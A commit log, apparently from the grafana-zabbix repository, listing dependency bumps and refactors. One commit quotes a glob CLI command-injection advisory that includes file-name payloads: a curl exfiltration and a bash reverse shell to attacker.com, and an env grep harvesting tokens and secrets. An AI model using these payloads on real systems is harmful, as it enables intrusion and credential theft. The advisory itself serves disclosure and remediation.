href="https://redirect.github.com/nodeca/js-yaml/issues/290">#290</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/529">#529</a>.</li> <li>Added <code>styles: { '!!null': 'empty' }</code> option for dumper (serializes <code>{ foo: null }</code> as "<code>foo: </code>"), <a href="https://redirect.github.com/nodeca/js-yaml/issues/570">#570</a>.</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b7a953b178 |
chore(deps): update dependency style-loader to v3.3.4 (#2151)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[style-loader](https://redirect.github.com/webpack-contrib/style-loader)
| [`3.3.3` →
`3.3.4`](https://renovatebot.com/diffs/npm/style-loader/3.3.3/3.3.4) |
|
|
---
### Release Notes
<details>
<summary>webpack-contrib/style-loader (style-loader)</summary>
###
[`v3.3.4`](https://redirect.github.com/webpack/style-loader/releases/tag/v3.3.4)
[Compare
Source](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
#####
[3.3.4](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
(2024-01-09)
##### Bug Fixes
- css experiments logic
([c12e70b](
|
||
Zoltán Bedi
|
fb046e5715 |
Chore: Migrate workflows to use create-github-app-token (#2142)
- Removes dependabot.yml as renovate will update grafana-sdk for us - Migrates to `create-github-app-token` - Pin workflows - Removes is-compatible.yml I found that workflow not helping much but creating an annoyingly long comment Fixes https://github.com/grafana/oss-big-tent-squad/issues/144 |
||
|
renovate-sh-app[bot]
|
c02767b1c3 |
chore(deps): update dependency sass-loader to v13.3.3 (#2146)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [sass-loader](https://redirect.github.com/webpack/sass-loader) | [`13.3.1` -> `13.3.3`](https://renovatebot.com/diffs/npm/sass-loader/13.3.1/13.3.3) |  |  | --- ### Release Notes <details> <summary>webpack/sass-loader (sass-loader)</summary> ### [`v13.3.3`](https://redirect.github.com/webpack/sass-loader/blob/HEAD/CHANGELOG.md#1400-2024-01-15) [Compare Source](https://redirect.github.com/webpack/sass-loader/compare/v13.3.2...v13.3.3) ##### ⚠ BREAKING CHANGES - removed `fibers` support - minimum supported Node.js version is `18.12.0` ([627f55d]( |
||
|
Jocelyn Collado-Kuri
|
127367464e |
Standardization across Zabbix UI components (#2141)
## Summary Throughout Zabbix we did not have a uniform UI - some drop-down were using `Select` others `Combobox` others a custom one that we created. Some had placeholders and others did not. This PR aims to standardize our Zabbix UI across our query, variable and config editors ## Detailed summary - Migrate from `Select` to `Combobox` -> `Select` component is deprecated - Migrate from `HorizontalGroup` to `Stack` -> `HorizontalGroup` is also deprecated - Remove use of "custom" dropdown `MetricPickerMenu` in favor of `Combobox` ensuring uniformity across our drop-down and removing maintenance overhead for us down the line - Standardize placeholders across all inputs <img width="630" height="243" alt="Screenshot 2025-12-17 at 1 13 45 PM" src="https://github.com/user-attachments/assets/9382057e-b443-4474-a9c8-850086d7f3d4" /> <img width="691" height="256" alt="Screenshot 2025-12-17 at 1 14 05 PM" src="https://github.com/user-attachments/assets/a05ff2af-8603-4752-8d12-337dc381c0fd" /> ## Why To have a clean and standard UI and remove use of UI deprecated packages. ## How to test - Query Editor: - By creating a new query in a dashboard or Explore and interacting with all the different query types and drop-downs - All drop-downs should be searchable and have placeholders - Config Editor: - By going to a datasource and ensuring that the dropdown for Datasource (when DB connection is enabled) and Auth type are responsive and working as expected) Fixes: https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3740545830&issue=grafana%7Coss-big-tent-squad%7C139 |
||
|
Jocelyn Collado-Kuri
|
ce4a8d3e19 |
Migrate from DatasourceAPI to DatasourceWithBackend (#2123)
This PR migrates the use of `DatasourceApi` to `DatasourceWithBackend`, with this a couple additional improvements were made: 1. Migrate to use `interpolateVariablesInQuery` everywhere instead of the custom `replaceTemplateVariables` we were using 2. Moves util functions out of `datasource.ts` and into the existing `utils.ts` <img width="1261" height="406" alt="Screenshot 2025-11-20 at 11 37 56 AM" src="https://github.com/user-attachments/assets/9e396cf2-eab0-49d1-958c-963a2e896eba" /> Now we can see the `query` calls being made to the backend: <img width="367" height="102" alt="Screenshot 2025-11-20 at 11 38 18 AM" src="https://github.com/user-attachments/assets/a5a9a337-7f19-4f7c-9d04-9d30c0216fb2" /> Tested: - By running queries from Explore and Dashboards (with and without variables) - By interacting with all the different Editors to make sure `ComboBox` was working as expected Next: Once this is merged, we will next be able to slowly move away from using the `ZabbixConnector` to make backend datasource calls. Fixes: [#131](https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=139450234&issue=grafana%7Coss-big-tent-squad%7C131) |
||
|
ismail simsek
|
cc492b916d |
Update react-table to v8 (#2131)
Updating react-table to v8. - Migrating the existing table to v8 - Preserving the visuals and logic What's done? - Cell components are moved under `Cells` folder - Old styles for react-table-6 is removed. - Old types are removed - All logic was preserved - Some cell components are removed for simplicity Fixes: https://github.com/grafana/oss-big-tent-squad/issues/125 |
||
|
Jocelyn Collado-Kuri
|
e073382983 |
Fix always fetch Zabbix version before issuing new requests (#2133)
Previously we were only fetching the version when the version was `0`. This generally worked, but posed some problems when customers were updating their Zabbix version, specifically when upgrading from a version < `7.2.x` to `7.2.x` or above. Before `7.2.x`, an `auth` parameter was still supported when issuing a zabbix request, this was deprecated in `6.4.x` and later removed in `7.2.x`. When a user was on a version < `7.2.x` all the outgoing requests would add this `auth` parameter. When upgrading to `7.2.x` this was a problem, because the version was not `0`, hence, not requiring getting the version again, but also because we were still building the request considering an older version and adding the `auth` parameter, when this was no longer supported. This PR removes the check for `version == 0`, though this now means that every request that goes out will check the version before hand, I think this will give us a more accurate representation of the version that needs to be used. fixes https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3683181283&issue=grafana%7Coss-big-tent-squad%7C135 |
||
|
ismail simsek
|
3da36ec2bb |
Chore: Convert problems to functional component (#2125)
This is a prerequisite for ugrading the react-table to v8. - No logic change is introduced. - Update DataSourceRef imports. The old import was deprecated. |
||
|
dependabot[bot]
|
360b5172cf |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.283.0 to 0.284.0 (#2130)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.283.0 to 0.284.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.284.0</h2> <h2>What's Changed</h2> <ul> <li>Vendor JSON schema to avoid network calls in tests by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1434">grafana/grafana-plugin-sdk-go#1434</a></li> <li>chore(deps): Update module golang.org/x/sys to v0.38.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1436">grafana/grafana-plugin-sdk-go#1436</a></li> <li>Fix: only build middleware chain once by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1437">grafana/grafana-plugin-sdk-go#1437</a></li> <li>chore(deps): Update GitHub Actions (major) by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1388">grafana/grafana-plugin-sdk-go#1388</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.283.0...v0.284.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.283.0...v0.284.0</a></p> <h2>Compatibility</h2> <p>Note: The below are false positives. The changes are due to a change in method receiver types (<a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1437#issuecomment-3570860849">context</a>)</p> <pre><code>❯ gorelease -base v0.283.0 -version v0.284.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>incompatible changes</h2> <p>MiddlewareHandler.CallResource: removed MiddlewareHandler.CheckHealth: removed MiddlewareHandler.CollectMetrics: removed MiddlewareHandler.ConvertObjects: removed MiddlewareHandler.MutateAdmission: removed MiddlewareHandler.PublishStream: removed MiddlewareHandler.RunStream: removed MiddlewareHandler.SubscribeStream: removed MiddlewareHandler.ValidateAdmission: removed MiddlewareHandler: no longer implements AdmissionHandler</p> <h1>summary</h1> <p>v0.284.0 is a valid semantic version for this release. </code></pre></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b11f2b1902 |
chore(deps): update dependency @types/node to ^20.19.16 (#2105)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`^20.8.7` -> `^20.19.16`](https://renovatebot.com/diffs/npm/@types%2fnode/20.19.16/20.19.25) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzguNSIsInVwZGF0ZWRJblZlciI6IjQxLjEzOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJ1cGRhdGUtcGF0Y2giXX0=--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f858259eaf |
chore(deps): update dependency @babel/core to ^7.28.4 (#2126)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@babel/core](https://babel.dev/docs/en/next/babel-core) ([source](https://redirect.github.com/babel/babel/tree/HEAD/packages/babel-core)) | [`^7.21.4` -> `^7.28.4`](https://renovatebot.com/diffs/npm/@babel%2fcore/7.28.4/7.28.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>babel/babel (@​babel/core)</summary> ### [`v7.28.5`](https://redirect.github.com/babel/babel/blob/HEAD/CHANGELOG.md#v7285-2025-10-23) [Compare Source](https://redirect.github.com/babel/babel/compare/v7.28.4...v7.28.5) ##### 👓 Spec Compliance - `babel-parser` - [#​17446](https://redirect.github.com/babel/babel/pull/17446) Allow `Runtime Errors for Function Call Assignment Targets` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-validator-identifier` - [#​17501](https://redirect.github.com/babel/babel/pull/17501) fix: update identifier to unicode 17 ([@​fisker](https://redirect.github.com/fisker)) ##### 🐛 Bug Fix - `babel-plugin-proposal-destructuring-private` - [#​17534](https://redirect.github.com/babel/babel/pull/17534) Allow mixing private destructuring and rest ([@​CO0Ki3](https://redirect.github.com/CO0Ki3)) - `babel-parser` - [#​17521](https://redirect.github.com/babel/babel/pull/17521) Improve `@babel/parser` error typing ([@​JLHwung](https://redirect.github.com/JLHwung)) - [#​17491](https://redirect.github.com/babel/babel/pull/17491) fix: improve ts-only declaration parsing ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-plugin-proposal-discard-binding`, `babel-plugin-transform-destructuring` - [#​17519](https://redirect.github.com/babel/babel/pull/17519) fix: `rest` correctly returns plain array ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-create-class-features-plugin`, `babel-helper-member-expression-to-functions`, `babel-plugin-transform-block-scoping`, `babel-plugin-transform-optional-chaining`, `babel-traverse`, `babel-types` - [#​17503](https://redirect.github.com/babel/babel/pull/17503) Fix `JSXIdentifier` handling in `isReferencedIdentifier` ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-traverse` - [#​17504](https://redirect.github.com/babel/babel/pull/17504) fix: ensure scope.push register in anonymous fn ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### 🏠 Internal - `babel-types` - [#​17494](https://redirect.github.com/babel/babel/pull/17494) Type checking babel-types scripts ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### :running\_woman: Performance - `babel-core` - [#​17490](https://redirect.github.com/babel/babel/pull/17490) Faster finding of locations in `buildCodeFrameError` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4xMi4xIiwidXBkYXRlZEluVmVyIjoiNDIuMTIuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
46a0157d70 |
fix(deps): pin dependencies (#2104)
This PR contains the following updates: | Package | Type | Update | Change | Age | Confidence | |---|---|---|---|---|---| | [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react)) | devDependencies | pin | [`^18.2.25` -> `18.3.24`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.24/18.3.24) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react-dom](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react-dom)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react-dom/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Release Notes <details> <summary>facebook/react (react)</summary> ### [`v18.3.1`](https://redirect.github.com/facebook/react/blob/HEAD/CHANGELOG.md#1831-April-26-2024) [Compare Source](https://redirect.github.com/facebook/react/compare/v18.3.0...v18.3.1) - Export `act` from `react` [f1338f]( |
||
|
Jocelyn Collado-Kuri
|
89ae290942 |
Move health check to the backend (#2120)
This PR moves the health check to backend only leaving in the frontend the functionality to test the dbconnector datasource. Leaving the `dbconnector.testDataSource` should be fine since the datasource types we allow for db connection with Zabbix already are backend datasources, and so their health requests would go through the backend. Verified: Clicking test and seeing a `health` request go out. IMPORTANT: While testing this in the UI, I found a bug with the config editor - whenever a change is made in the UI and tested, the changes don't take effect (i.e. disabling trends, keeps `trends` set to `true`, enabling db connection keep `dbConnectionEnabled` set to `false` and so on.). Created a separate [issue](https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3627315751&issue=grafana%7Coss-big-tent-squad%7C132) to fix this Fixes https://github.com/grafana/oss-big-tent-squad/issues/124 Fixes https://github.com/grafana/grafana-zabbix/issues/2004 |
||
|
dependabot[bot]
|
631d3bdc4f |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.281.0 to 0.283.0 (#2124)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.281.0 to 0.283.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.283.0</h2> <h2>What's Changed</h2> <ul> <li>experimental: change time-range behavior by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1428">grafana/grafana-plugin-sdk-go#1428</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.282.0...v0.283.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.282.0...v0.283.0</a></p> <h2>Compatibility</h2> <p>We adjusted the way the experimental <code>v0alpha1.DataQuery</code> objects get serialised to JSON to be more compatible with past versions, for details see <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1428">grafana/grafana-plugin-sdk-go#1428</a></p> <pre><code>gorelease -base v0.282.0 -version v0.283.0 # summary v0.283.0 is a valid semantic version for this release. </code></pre> <h2>v0.282.0</h2> <h2>What's Changed</h2> <ul> <li>chore(deps): Update module google.golang.org/grpc to v1.76.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1423">grafana/grafana-plugin-sdk-go#1423</a></li> <li>chore(deps): Update Upstream packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1424">grafana/grafana-plugin-sdk-go#1424</a></li> <li>chore(deps): Update Upstream packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1425">grafana/grafana-plugin-sdk-go#1425</a></li> <li>experimental: conversion: improved tests by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1427">grafana/grafana-plugin-sdk-go#1427</a></li> <li>chore(deps): Update module github.com/grpc-ecosystem/go-grpc-middleware/v2 to v2.3.3 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1430">grafana/grafana-plugin-sdk-go#1430</a></li> <li>chore(deps): Update module github.com/prometheus/common to v0.67.2 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1431">grafana/grafana-plugin-sdk-go#1431</a></li> <li>Add debug logs to highlight provider behaviour by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1432">grafana/grafana-plugin-sdk-go#1432</a></li> <li>Context-aware instance manager by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1352">grafana/grafana-plugin-sdk-go#1352</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.281.0...v0.282.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.281.0...v0.282.0</a></p> <h2>Compatibility</h2> <pre><code>❯ gorelease -base v0.281.0 -version v0.282.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>compatible changes</h2> <p>(*GrafanaCfg).Diff: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/backend/instancemgmt</h1> <h2>compatible changes</h2> <p>NewInstanceManagerWrapper: added NewTTLInstanceManager: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/experimental/featuretoggles</h1> <h2>compatible changes</h2> <p>TTLInstanceManager: added</p> <h1>summary</h1> <p>v0.282.0 is a valid semantic version for this release. </code></pre></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
5790b9a68d |
chore(deps): update dependency glob to v11 [security] (#2122)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [glob](https://redirect.github.com/isaacs/node-glob) | [`^10.2.7` ->
`^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.5/11.1.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
- **Library API Not Affected:** Core glob functions (`glob()`,
`globSync()`, async iterators) are safe
- **CLI-Specific:** Only the command-line interface with `-c/--cmd`
option is vulnerable
### Remediation
- Upgrade to `glob@11.1.0` or higher, as soon as possible.
- If any `glob` CLI actions fail, then convert commands containing
positional arguments, to use the `--cmd-arg`/`-g` option instead.
- As a last resort, use `--shell` to maintain `shell:true` behavior
until glob v12, but ensure that no untrusted contents can possibly be
encountered in the file path results.
---
### glob CLI: Command injection via -c/--cmd executes matches with
shell:true
[CVE-2025-64756](https://nvd.nist.gov/vuln/detail/CVE-2025-64756) /
[GHSA-5j98-mcp5-4vw2](https://redirect.github.com/advisories/GHSA-5j98-mcp5-4vw2)
<details>
<summary>More information</summary>
#### Details
##### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
##### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
##### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
##### Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
##### Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
##### Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
##### Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
**Environment Variable Harvesting:**
```bash
##### Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'
```
##### Impact
**Arbitrary Command Execution:**
- Commands execute with full privileges of the user running glob CLI
- No privilege escalation required - runs as current user
- Access to environment variables, file system, and network
**Real-World Attack Scenarios:**
**1. CI/CD Pipeline Compromise:**
- Malicious PR adds files with crafted names to repository
- CI pipeline uses `glob -c` to process files (linting, testing,
deployment)
- Commands execute in CI environment with build secrets and deployment
credentials
- Potential for supply chain compromise through artifact tampering
**2. Developer Workstation Attack:**
- Developer clones repository or extracts archive containing malicious
filenames
- Local build scripts use `glob -c` for file processing
- Developer machine compromise with access to SSH keys, tokens, local
services
**3. Automated Processing Systems:**
- Services using glob CLI to process uploaded files or external content
- File uploads with malicious names trigger command execution
- Server-side compromise with potential for lateral movement
**4. Supply Chain Poisoning:**
- Malicious packages or themes include files with crafted names
- Build processes using glob CLI automatically process these files
- Wide distribution of compromise through package ecosystems
**Platform-Specific Risks:**
- **POSIX/Linux/macOS:** High risk due to flexible filename characters
and shell parsing
- **Windows:** Lower risk due to filename restrictions, but
vulnerability persists with PowerShell, Git Bash, WSL
- **Mixed Environments:** CI systems often use Linux containers
regardless of developer platform
##### Affected Products
- **Ecosystem:** npm
- **Package name:** glob
- **Component:** CLI only (`src/bin.mts`)
- **Affected versions:** v10.3.7 through v11.0.3 (and likely later
versions until patched)
- **Introduced:** v10.3.7 (first release with CLI containing `-c/--cmd`
option)
- **Patched versions:** 11.1.0
**Scope Limitation:**
